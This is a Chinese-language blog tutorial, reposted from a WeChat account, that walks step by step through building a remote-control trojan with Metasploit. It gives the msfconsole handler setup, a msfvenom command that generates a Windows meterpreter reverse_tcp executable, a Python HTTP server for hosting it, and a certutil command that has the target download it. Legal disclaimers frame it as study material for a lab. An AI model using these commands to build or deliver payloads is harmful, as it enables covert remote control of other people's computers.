metasploit(1) 生成远控木马

admin 2025年4月21日01:40:27评论0 views字数 912阅读3分2秒阅读模式

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

一、msf木马配置

1、更新kali资源

apt-get update 
#更新软件包信息数据库

apt-get upgrade
#升级已安装软件包到最新兼容版本

2、启动msf(不显示加载信息)

msfconsole -q  #不显示加载信息

下图为显示加载信息跟不显示加载信息的对比

metasploit(1) 生成远控木马

3、msf配置监听信息

use exploit/multi/handler 
#进入模块

show options
#查看有什么参数需要填写
metasploit(1) 生成远控木马
set lhost 192.168.60.128
#设置本机ip

set lport 4444
#设置本机监听端口
metasploit(1) 生成远控木马

4、msf配置payload信息开启监听

show payloads 
#太多了 我们这里选择常用的

set payload windows/meterpreter/reverse_tcp
#设置payload

run
#执行监听
metasploit(1) 生成远控木马
metasploit(1) 生成远控木马

5、生成木马

msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows -o ./meter_re_tcp_x86.exe LHOST=192.168.60.128 LPORT=4444

#-f  #指定文件格式  exe等等  
msfvenom -l formats
# 如果我们想知道它有什么格式我们可以msfvenom -l formats

#-a #指定架构的意思
msfvenom -l archs 
#查看所有msf支持的架构

#--platform  指定平台的意思
msfvenom -l platforms 
#查看所有支持的平台
metasploit(1) 生成远控木马

二、靶机运行木马

1、开启http微服务

python -m http.server 8008
#远控程序生成路径下开启web微服务
metasploit(1) 生成远控木马

2、靶机下载远控程序

通过cmd下载
certutil -urlcache -split -f "http://192.168.60.128:8008/" meter_re_tcp_x86.exe
metasploit(1) 生成远控木马
metasploit(1) 生成远控木马

3、运行靶机的远控程序

metasploit(1) 生成远控木马

三、msf上线

metasploit(1) 生成远控木马
metasploit(1) 生成远控木马

原文始发于微信公众号(泷羽SEC-ohh):metasploit(1) 生成远控木马

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月21日01:40:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   metasploit(1) 生成远控木马http://cn-sec.com/archives/3974967.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息